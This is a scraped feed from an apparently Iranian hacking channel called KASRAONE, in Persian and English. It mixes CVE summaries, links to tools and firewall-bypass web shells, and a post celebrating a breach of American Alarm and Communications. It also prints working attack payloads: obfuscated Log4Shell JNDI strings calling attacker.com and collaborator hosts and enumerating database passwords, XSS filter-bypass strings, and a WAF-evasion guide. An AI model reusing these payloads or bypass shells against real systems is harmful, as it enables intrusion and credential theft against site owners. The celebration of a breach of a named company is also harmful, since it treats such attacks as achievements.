KASRAONE

🔴 ezXSS

Git Hub : 🐈

Easy to use dashboard with settings, statistics, payloads, view/share/search reports
🆕 Persistent XSS sessions with reverse proxy aslong as the browser is active
Unlimited users with permissions to personal payloads & their reports
Instant alerts via mail, Telegram, Slack, Discord or custom callback URL
Custom javascript payloads
Custom payload links to distinguish insert points
Extract additional pages, block, whitelist and other filters
Secure your login with Two-factor (2FA)

The following information can be collected on a vulnerable page:

The URL of the page

IP Address
Any page referer (or share referer)

LINKTOOLS

        ♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀‌ ‌ ⌲⁣
         ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ

                        K1
                  kasraone

👍2

938 viewsedited 03:32

KASRAONE

WebShells

Prvi8 PHP AND ASPX Web Shells ( Bypasser Web Shells ) firewall Bypass Shells (web shells)
Imunify360 ByPass ( 403.php )

Git Hub 🐈

https://github.com/sagsooz/Bypass-Webshell

        ♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀‌ ‌ ⌲⁣
         ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ

                        K1
                  kasraone

GitHub

GitHub - sagsooz/Webshell-bypass: A collection of advanced PHP and ASPX web shells designed to bypass security measures.

A collection of advanced PHP and ASPX web shells designed to bypass security measures. - sagsooz/Webshell-bypass

⚡2

870 views06:12

KASRAONE

🔴 Blind SSRF to Port Scanning through response time

LINK MEDIUM

        ♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀‌ ‌ ⌲⁣
         ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ

                        K1
                  kasraone

Medium

Blind SSRF to Port Scanning through response time

Introduction:

853 viewsedited 12:56

KASRAONE

🔴 اطلاعات سازمان آمریکایی توست هکرها هک شد ! : American Alarm and

Communications
که در سال 1971 تاسیس شد و دفتر مرکزی آن در آرلینگتون، ماساچوست، مستقر است، American Alarm and Communications
یک شرکت ادغام و نظارت بر سیستم های امنیتی 24 ساعته است. در American Alarm ما به حفاظت محلی و قابل اعتماد اعتقاد داریم. ما از سال 1971 از خانه‌ها و مشاغل در سراسر نیوانگلند محافظت می‌کنیم. شرکت ما با متخصصان متعهد کار می‌کند که در جوامعی که به آنها خدمت می‌کنند زندگی می‌کنند - شاید حتی در همسایگی شما.

سایت: www.americanalarm.com

نشانی:
297 برادوی، آرلینگتون،
ماساچوست، 02474،
ایالات متحده

        ♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀‌ ‌ ⌲⁣
         ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ

                        K1
                  kasraone

😱2

934 viewsedited 11:28

KASRAONE

🔴 CISA
دستورالعمل اضطراری را به آژانس های فدرال در مورد سوء استفاده های Ivanti Zero-Day صادر می کند

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Friday issued an emergency directive urging Federal Civilian Executive Branch (FCEB) agencies to implement mitigations against two actively exploited zero-day flaws in Ivanti Connect Secure (ICS) and Ivanti Policy Secure (IPS) products.

The development arrives as the vulnerabilities – an authentication bypass (CVE-2023-46805) and a code injection bug (CVE-2024-21887) – have come under widespread exploitation by multiple threat actors. The flaws allow a malicious actor to craft malicious requests and execute arbitrary commands on the system.

        ♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀‌ ‌ ⌲⁣
         ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ

                        K1
                  kasraone

❤3👍1

918 viewsedited 06:39

KASRAONE

🔴 CVE

CVE-2023-48382

Softnext Mail SQR Expert

یک پلتفرم مدیریت ایمیل است که دارای یک آسیب‌پذیری Local File Inclusion (LFI) در URL مربوط به تحویل ایمیل است. یک مهاجم ازراه دور تأیید نشده می‌تواند از این آسیب‌پذیری برای اجرای فایل PHP دلخواه با پسوند فایل .asp در مسیرهای خاص سیستم، برای دسترسی و اصلاح اطلاعات جزئی سیستم سوء استفاده کند، اما در دسترس بودن سرویس تأثیری ندارد.

LINK

        ♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀‌ ‌ ⌲⁣
         ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ

                        K1
                  kasraone

⚡2

1.03K views14:50

KASRAONE

🔴 Local File Inclusion

(LFI) — Web Application Penetration Testing

MEDIUM

LINK

        ♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀‌ ‌ ⌲⁣
         ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ

                        K1
                  kasraone

❤2

870 viewsedited 13:51

KASRAONE

بازی ایران و ژاپن

برد ایران را به تمامی ایرانی های عزیز
کشورمان تبریک میگوییم ❤

2🇮🇷 🇯🇵1

❤8👍1

838 views13:35

KASRAONE

🔴 CVE

CVE-2024-0728

LFI

A vulnerability classified as problematic was found in ForU CMS up to 2020-06-23. Affected by this vulnerability is an unknown functionality of the file channel.php. The manipulation of the argument c_cmodel leads to file inclusion. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251551.

        ♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀‌ ‌ ⌲⁣
         ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ

                        K1
                  kasraone

👍2

979 viewsedited 06:42

KASRAONE

🔴CVE

CVE-2024-22859

آسیب‌پذیری Cross-Site Request Forgery (CSRF) در livewire قبل از نسخه 3.0.4، به مهاجمان راه دور اجازه می‌دهد تا تابع getCsrfToken کد دلخواه را اجرا کنند. توجه: فروشنده با این موضوع مخالفت می کند زیرا commit 5d88731 یک مشکل قابلیت استفاده (کدهای وضعیت HTTP 419 برای فعالیت مشتری قانونی) را برطرف می کند، نه یک مشکل امنیتی.

        ♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀‌ ‌ ⌲⁣
         ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ

                        K1
                  kasraone

GitHub

[GHSA-2cjh-75gp-34gc] livewire Cross-Site Request Forgery vulnerability by valorin · Pull Request #3490 · github/advisory-database

Updates

Affected products
CVSS
Severity

Comments
This does not appear to be an actual vulnerability.
The referenced commit is fixing a CSRF expiring issue, which was causing 419 errors and I cann...

850 views21:53

KASRAONE

🔴 Log4Shell

CVE-2021-44228 Log4Shell

🔴 Apache Log4j2 <=2.14.1

Payloads

Java
# Identify Java version and hostname
${jndi:ldap://${java:version}.domain/a}
${jndi:ldap://${env:JAVA_VERSION}.domain/a}
${jndi:ldap://${sys:java.version}.domain/a}
${jndi:ldap://${sys:java.vendor}.domain/a}
${jndi:ldap://${hostName}.domain/a}
${jndi:dns://${hostName}.domain}

# More enumerations keywords and variables
java:os
docker:containerId
web:rootDir
bundle:config:db.password

🔴WAF Bypass

${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://127.0.0.1:1389/a}

# using lower and upper
${${lower:jndi}:${lower:rmi}://127.0.0.1:1389/poc}
${j${loWer:Nd}i${uPper::}://127.0.0.1:1389/poc}
${jndi:${lower:l}${lower:d}a${lower:p}://loc${upper:a}lhost:1389/rce}

# using env to create the letter
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//your.burpcollaborator.net/a}
${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attacker.com/a}

        ♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀‌ ‌ ⌲⁣
         ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ

                        K1
                  kasraone

Attacker

Attacker - The Domain Name Attacker.com is Now For Sale.

Attacker.com is now for sale, lease or rent. Smart domain names compound conversion rates and this domain name for Attacker marketing is a wise investment.

⚡2

797 viewsedited 06:07

KASRAONE

🔴 MEDIUM

Web Application Firewall (WAF) Evasion Techniques

🔴 LINK

        ♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀‌ ‌ ⌲⁣
         ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ

                        K1
                  kasraone

Medium

Web Application Firewall (WAF) Evasion Techniques

I can read your passwd file with: “/???/??t /???/??ss??”. Having fun with Sucuri WAF, ModSecurity, Paranoia Level and more…

❤1

881 views06:59

KASRAONE

بایپس باگ XSS

<A
HREF="http://66.102.7.147/">XSS</A>0\"autofocus/onfocus=alert(1)--><video/poster/ error=prompt(2)>"-confirm(3)-"veris-->group<svg/onload=alert(/XSS/)//#"><img src=M onerror=alert('XSS');>

        ♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀‌ ‌ ⌲⁣
         ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ

                        K1
                  kasraone

🔥2

926 views09:06

KASRAONE

Git Hub 🐈

Tools bypass
Gema

Neam :
FabricBlockedServersBypass

Link

        ♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀‌ ‌ ⌲⁣
         ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ

                        K1
                  kasraone

GitHub

GitHub - svenar-nl/FabricBlockedServersBypass: Is a server you play on blocked by Mojang? Use this fabric mod to bypass it!

Is a server you play on blocked by Mojang? Use this fabric mod to bypass it! - svenar-nl/FabricBlockedServersBypass

❤1

812 viewsedited 13:54

KASRAONE

🔴 XSS

Payload: "><A%20%252F=""Href=%20JavaScript:k=%27a%27,topk%2B%27lert%27>

        ♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀‌ ‌ ⌲⁣
         ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ

                        K1
                  kasraone

❤2

827 views13:59

KASRAONE

www.comptia.org

A+ Certification | CompTIA

Begin your tech career with CompTIA A+, the go-to certification for IT support roles. Opt for V15 to access the latest content or complete V14 before it retires on September 25, 2025.

❤4👍1

1.01K viewsedited 11:28

KASRAONE

🔴دور زدن WAF وب سایت

خوب سلام درود
به تمامی کاربران عزیز کسری وان امیدوارم حالتون عالی باشه این بار میخواهیم درباره دورزدن WAF وب سایت صحبت کنیم

حمایت یادتون نره

برای دور زدن WAF (Web Application Firewall) یک وب سایت، باید اقدامات امنیتی خاصی را انجام دهید. البته توجه داشته باشید که دور زدن WAF یک فعالیت غیرقانونی است و ممکن است منجر به پیامدهای قانونی شدیدی شود. در اینجا توضیحاتی برای اهداف آموزشی ارائه می‌شود:

1. استفاده از تکنیک‌های مخرب: برخی حملات مانند حملات از نوع SQL Injection، Cross-Site Scripting (XSS)، و Command Injection می‌توانند به شما کمک کنند تا WAF را دور بزنید. با این حال، توجه داشته باشید که انجام این حملات تخلف قانونی است.

2. استفاده از تغییر IP: اگر IP شما در لیست سیاه WAF قرار گرفته است، می‌توانید از VPN یا پروکسی استفاده کنید تا آدرس IP خود را تغییر دهید و به وب سایت دسترسی پیدا کنید.

3. استفاده از پروکسی‌های متحرک: برخی پروکسی‌ها و تکنولوژی‌های مشابه می‌توانند به شما کمک کنند تا WAF را دور بزنید.

4. شناسایی ضعف‌های WAF: با بررسی نحوه عملکرد WAF و شناسایی ضعف‌های آن، ممکن است بتوانید روش‌های دور زدن را پیدا کنید.

5استفاده از سینتکس JSON در payload‌های تزریقی SQL می‌تواند به شما کمک کند تا WAF را دور بزنید. زیرا بسیاری از WAF‌ها برای تشخیص حملات SQLi به دنبال الگوهای خاصی می‌گردند که در payload‌های SQLi وجود دارد. با اضافه کردن سینتکس JSON به payload، ممکن است WAF نتواند به درستی تشخیص حمله را انجام دهد و اجازه ورود payload به سیستم را بدهد.

توجه داشته باشید که دور زدن WAF یک عمل غیرقانونی است و ممکن است به شما مشکلات قانونی و امنیتی جدی وارد کند. بهترین راه برای حفظ امنیت وب سایت خود، استفاده از روش‌های امنیتی قوی و همچنین همکاری با تیم امنیت اطلاعات خود است.

        ♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀‌ ‌ ⌲⁣
         ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ

                        K1
                  kasraone

❤3👍2⚡1

1.27K views17:58

KASRAONE

دوستان به دلیل اینکه کاربران خارجی پیام دادند
که پست ها به زبان انگلیسی بزاریم به نظره شما
اینطور باشد
نظره خود را با ما در میان بگذارید ممنون ❤

👍6⚡1

1.25K viewsedited 18:18

KASRAONE

پست جدید حمایت یادتون نره ممنون

https://vrgl.ir/PHnLd

        ♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀‌ ‌ ⌲⁣
         ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ

                        K1
                  kasraone

ویرگول

حمله از راه دور به سبک Stuxnet با بدافزار PLC مبتنی بر وب امکان پذیر است - ویرگول

تیمی از محققان بدافزاری را طراحی کرده‌اند که برای هدف قرار دادن کنترل‌کننده‌های منطقی قابل برنامه‌ریزی مدرن (PLC) طراحی شده است تا نشان دهد…

⚡2👍1🎉1

1.08K views07:12

KASRAONE

🔴 CVE

CVE-2024-1750

یک آسیب پذیری که به عنوان بحرانی طبقه بندی شده بود، در TemmokuMVC تا 2.3 یافت شد.

تابع get_img_url/img_replace

در کتابخانه lib/images_get_down.php کامپوننت Image Download Handler تحت تأثیر قرار گرفته است. دستکاری منجر به سریال زدایی می شود. امکان انجام حمله از راه دور وجود دارد. پیچیدگی یک حمله نسبتاً زیاد است. گفته می شود که قابلیت بهره برداری دشوار است. این سوء استفاده برای عموم فاش شده است و ممکن است مورد استفاده قرار گیرد. شناسه این آسیب پذیری VDB-254532 است.

توجه: با فروشنده در مورد این افشای اولیه تماس گرفته شد اما به هیچ وجه پاسخ نداد.

این آسیب پذیری قابل بهره برداری از راه دور است و پیچیدگی حمله نسبتاً زیاد است

        ♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀‌ ‌ ⌲⁣
         ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ

                        K1
                  kasraone

❤1⚡1

858 viewsedited 12:47

KASRAONE

ActiveScan++

ActiveScan++ extends Burp Suite's active and passive scanning capabilities. Designed to add minimal network overhead, it identifies application behaviour that may be of interest to advanced testers:

Potential host header attacks (password reset poisoning, cache poisoning, DNS rebinding)

Edge Side Includes

XML input handling

Suspicious input transformation (eg 7*7 => '49', \\ => '\' )

Passive-scanner issues that only occur during fuzzing (install the 'Error Message Checks' extension for maximum effectiveness)

ActiveScan++

قابلیت های اسکن فعال و غیرفعال Burp Suite را گسترش می دهد. این برنامه برای اضافه کردن حداقل هزینه های شبکه طراحی شده است و رفتار برنامه ای را که ممکن است برای تست کنندگان پیشرفته جالب باشد ، شناسایی می کند:

حملات هدر میزبان بالقوه (مسمومیت با تنظیم مجدد رمز عبور ، مسمومیت با حافظه پنهان، پیوند مجدد DNS)
لبه سمت شامل
مدیریت ورودی XML
تبدیل ورودی مشکوک (به عنوان مثال 7*7 => '49', \\ => '\' )
مشکلات اسکنر غیرفعال که فقط در طول فازینگ رخ می دهد (برای حداکثر اثربخشی ، افزونه "بررسی پیام خطا" را نصب کنید)

LINK TOOLS

         ♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀‌ ‌ ⌲⁣
         ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ   ˢᵃᵛᵉ ˢʰᵃʳᵉ

                        K1
                  kasraone

GitHub

GitHub - albinowax/ActiveScanPlusPlus: ActiveScan++ Burp Suite Plugin

ActiveScan++ Burp Suite Plugin. Contribute to albinowax/ActiveScanPlusPlus development by creating an account on GitHub.

👍8🎉7👏6❤4🔥4🥰3⚡2

951 views11:08

About

Blog

Apps

Platform